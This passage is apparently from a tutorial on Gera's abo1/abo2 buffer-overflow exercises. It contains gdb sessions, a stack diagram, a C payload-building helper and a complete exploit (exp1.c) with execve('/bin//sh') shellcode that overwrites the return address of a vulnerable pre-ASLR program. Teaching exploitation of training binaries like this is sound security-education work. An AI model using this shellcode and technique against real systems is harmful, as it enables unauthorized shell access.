edi            0xbffff954       -1073743532<br />
eip            0x41414141       0x41414141<br />
eflags         0x10286          66182<br />
(gdb) bt<br />
#0  0x41414141 in ?? ()<br />
Cannot access memory at address 0x41414141<br />
(gdb) q<br />
The program is running.  Exit anyway? (y or n) y<br />
user@CoreLabs:~/gera$<br />
<br />
When the operating system loads the program into memory and runs it, the image of the corresponding process looks like this:<br />
0xbfffffff --->  +--------------------------------------+<br />
                 |           four null bytes            |<br />
0xbffffffb --->  +--------------------------------------+<br />
                 |            program name              |<br />
                 +--------------------------------------+<br />
                 |              shellcode               |<br />
address of shellcode --->  +----------------------------+ <---<br />
                 |  shell environment variables and     |    |<br />
                 |  command-line arguments              |    |<br />
                 +--------------------------------------+    |<br />
   4 bytes --->  |           return address             | ----<br />
                 +--------------------------------------+<br />
   4 bytes --->  |             saved EBP                |<br />
                 +--------------------------------------+<br />
     |           |             buf[256]                 |   /|\<br />
     |           |                                      |    |<br />
     |           |             AAAAAAAA                 |    |<br />
stack growth     |             AAAAAAAA                 |    | overflow direction<br />
direction        |             AAAAAAAA                 |    |<br />
     |           |             AAAAAAAA                 |    |<br />
     |           |             AAAAAAAA                 |    |<br />
    \|/          +--------------------------------------+<br />
<br />
<br />
The function's return address is pushed onto the stack first, then the saved EBP (the caller's frame pointer), and below that sits the local variable buf[256]. Our goal is to overwrite the return address. Reaching it takes 256 + 4 + 4 = 264 bytes, and the last 4 bytes must hold the address of the shellcode. That address differs from one build and environment to another, so on Linux we use a trick: the exploit passes the shellcode as the program's only environment variable, and because the kernel copies the program name and then the environment strings to the very top of the stack, the address follows from this formula:<br />
<br />
shellcode_addr = 0xbffffffa - strlen(name_of_program) - strlen(shellcode)<br />
<br />
The constant comes from the stack top at 0xc0000000: subtract the four null bytes and the two terminating NUL bytes of the program name and of the shellcode string (0xc0000000 - 4 - 1 - 1 = 0xbffffffa), then the lengths of the two strings themselves. Two caveats: the program name must be the exact path handed to execve, because that is the string the kernel copies, and the calculation only holds on kernels without stack randomization. With ASLR the stack base changes on every run and a precomputed address like this is useless.<br />
<br />
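The following is an added example, not code from the original page or from Core Security; it reproduces the address arithmetic above, builds the 264-byte string the same way the exploit does, and adds one check the text leaves out: the computed address must not contain a 0x00 byte, otherwise strcpy() would stop copying before the return address is complete. It assumes (as labelled in the comments) the pre-ASLR 32-bit Linux layout with the stack top at 0xc0000000 and the frame layout shown in the diagram; the program path and shellcode are the ones used on this page.<br />

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not code from the original page or from Core Security.
 * Assumptions: 32-bit Linux of the pre-ASLR era with the stack top fixed at
 * 0xc0000000, and a frame laid out as buf[256] | saved EBP | return address. */

#define STACK_TOP    0xc0000000u     /* assumed fixed stack top (no ASLR) */
#define BUF_SIZE     256u            /* char buf[256] in abo1 */
#define SAVED_EBP    4u
#define RET_ADDR     4u
#define PAYLOAD_LEN  (BUF_SIZE + SAVED_EBP + RET_ADDR)   /* 264 */

/* Sample inputs (constructed for this example): the path passed to execve
 * and the 24-byte execve("/bin//sh") shellcode used on this page. */
static const char SAMPLE_PROG[] = "/home/user/gera/abo1";
static const char SAMPLE_SHELLCODE[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
    "\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

/* At exec time the kernel copies, from the top of the stack downwards: four
 * null bytes, the program name with its NUL, then each environment string
 * with its NUL. With the shellcode as the only environment string it
 * therefore starts right below the program name. */
uint32_t derive_shellcode_addr(const char *prog, const char *shellcode)
{
    uint32_t addr = STACK_TOP;
    addr -= 4;                               /* four null bytes */
    addr -= (uint32_t)strlen(prog) + 1;      /* "prog\0" */
    addr -= (uint32_t)strlen(shellcode) + 1; /* "shellcode\0" */
    return addr;
}

/* The shortcut formula from the text; must agree with the derivation above. */
uint32_t formula_shellcode_addr(const char *prog, const char *shellcode)
{
    return 0xbffffffau - (uint32_t)strlen(prog) - (uint32_t)strlen(shellcode);
}

/* strcpy() stops at the first 0x00 byte, so an address containing one can
 * never be copied in full; check this before building the payload. */
int addr_has_nul_byte(uint32_t addr)
{
    for (int i = 0; i < 4; i++)
        if (((addr >> (8 * i)) & 0xffu) == 0)
            return 1;
    return 0;
}

/* Lay out the 264-byte string: filler over buf and the saved EBP, the return
 * address in little-endian order, then a terminating NUL. out must hold
 * PAYLOAD_LEN + 1 bytes. Returns the length strcpy() would actually copy. */
size_t build_payload(char *out, uint32_t ret)
{
    memset(out, 'A', BUF_SIZE + SAVED_EBP);
    for (unsigned i = 0; i < RET_ADDR; i++)
        out[BUF_SIZE + SAVED_EBP + i] = (char)((ret >> (8 * i)) & 0xffu);
    out[PAYLOAD_LEN] = '\0';
    return strlen(out);
}

/* Wrappers over the sample inputs so the result can be inspected without
 * touching the stack of a real target. */
size_t sample_payload_len(void)
{
    static char payload[PAYLOAD_LEN + 1];
    return build_payload(payload, formula_shellcode_addr(SAMPLE_PROG, SAMPLE_SHELLCODE));
}

unsigned sample_payload_byte(size_t i)
{
    static char payload[PAYLOAD_LEN + 1];
    build_payload(payload, formula_shellcode_addr(SAMPLE_PROG, SAMPLE_SHELLCODE));
    return (unsigned char)payload[i];
}

int main(void)
{
    uint32_t ret = formula_shellcode_addr(SAMPLE_PROG, SAMPLE_SHELLCODE);
    printf("derived  0x%08x\n", derive_shellcode_addr(SAMPLE_PROG, SAMPLE_SHELLCODE));
    printf("formula  0x%08x%s\n", ret,
           addr_has_nul_byte(ret) ? "  (contains a NUL byte: strcpy would truncate)" : "");
    printf("payload  %zu bytes copied by strcpy\n", sample_payload_len());
    return 0;
}
```

For the page's own inputs (a 20-character path and 24 bytes of shellcode) both functions agree on 0xbfffffce, which contains no zero byte, and the payload comes out at exactly 264 bytes with the address at offsets 260 to 263. If the name of the target path or the shellcode changes, re-run the NUL-byte check: an address such as 0xbfffff00 would silently truncate the copy.<br />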
Below is the corresponding exploit:<br />
/*<br />
** exp1.c<br />
** Coded by CoreSecurity - info@core-sec.com<br />
**/<br />
#include <string.h><br />
#include <unistd.h><br />
#define BUFSIZE 264 + 1<br />
/* 24 bytes shellcode: execve("/bin//sh", ["/bin//sh"], NULL) */<br />
char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"<br />
                   "\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";<br />
int main(void) {<br />
    char *env[3] = {shellcode, NULL};   /* the shellcode is the only environment string */<br />
    char evil_buffer[BUFSIZE];<br />
    char *p;<br />
    /* Calculating address of shellcode */<br />
    int ret = 0xbffffffa - strlen(shellcode) - strlen("/home/user/gera/abo1");<br />
    /* Constructing the buffer */<br />
    p = evil_buffer;<br />
    memset(p, 'A', 260);            /* 256 bytes of buf plus the 4 bytes of saved EBP */<br />
    p += 260;<br />
    *((void **)p) = (void *)(ret);  /* overwrite the return address */<br />
    p += 4;<br />
    *p = '\0';<br />
    execle("/home/user/gera/abo1", "abo1", evil_buffer, NULL, env);<br />
    return 0;<br />
}<br />
<br />
<br />
Analysis of advanced buffer overflow exercise 2<br />
Source code:<br />
/* abo2.c *<br />
 * specially crafted to feed your brain by gera@core-sdi.com */<br />
<br />
/* This is a tricky example to make you think *<br />
 * and give you some help on the next one */<br />
<br />
#include <string.h>   /* strcpy */<br />
#include <stdlib.h>   /* exit */<br />
<br />
/* Note the deliberately swapped names: argv is the argument count here and<br />
 * argc the argument vector. */<br />
int main(int argv, char **argc)<br />
{<br />
    char buf[256];<br />
<br />
    strcpy(buf, argc[1]);<br />
    exit(1);<br />
}<br />
<br />
Let's debug this program again and see how it differs from abo1. The only change is that main calls exit(1) instead of returning, and the session below shows the consequence: even with 264 bytes the program does not crash but exits with code 1, because its ret instruction, and therefore the overwritten return address, is never reached.<br />
<br />
user@CoreLabs:~/gera$ gcc abo2.c -o abo2 -ggdb<br />
user@CoreLabs:~/gera$ gdb ./abo2<br />
GNU gdb 5.0<br />
Copyright 2000 Free Software Foundation, Inc.<br />
GDB is free software, covered by the GNU General Public License, and you<br />
are welcome to change it and/or distribute copies of it under certain<br />
conditions.<br />
Type "show copying" to see the conditions.<br />
There is absolutely no warranty for GDB.  Type "show warranty" for details.<br />
This GDB was configured as "i386-slackware-linux"...<br />
(gdb) r `perl -e 'printf "A" x 264'`<br />
Starting program: /home/user/gera/abo2 `perl -e 'printf "A" x 264'`<br />
<br />
Program exited with code 01.<br />
(gdb) disass main<br />
Dump of assembler code for function main:<br />
0x8048430 <main>:       push   %ebp<br />
0x8048431 <main+1>:     mov    %esp,%ebp<br />
0x8048433 <main+3>:     sub    $0x108,%esp<br />
0x8048439 <main+9>:     add    $0xfffffff8,%esp<br />
0x804843c <main+12>:    mov    0xc(%ebp),%eax<br />
0x804843f <main+15>:    add    $0x4,%eax<br />
0x8048442 <main+18>:    mov    (%eax),%edx<br />
0x8048444 <main+20>:    push   %edx<br />
0x8048445 <main+21>:    lea    0xffffff00(%ebp),%eax<br />
0x804844b <main+27>:    push   %eax<br />
0x804844c <main+28>:    call   0x8048334 <strcpy><br />
0x8048451 <main+33>:    add    $0x10,%esp<br />
0x8048454 <main+36>:    add    $0xfffffff4,%esp<br />
0x8048457 <main+39>:    push   $0x1<br />
0x8048459 <main+41>:    call   0x8048324 <exit><br />
0x804845e <main+46>:    add    $0x10,%esp<br />
0x8048461 <main+49>:    leave<br />
0x8048462 <main+50>:    ret<br />
End of assembler dump.<br />
(gdb) q<br />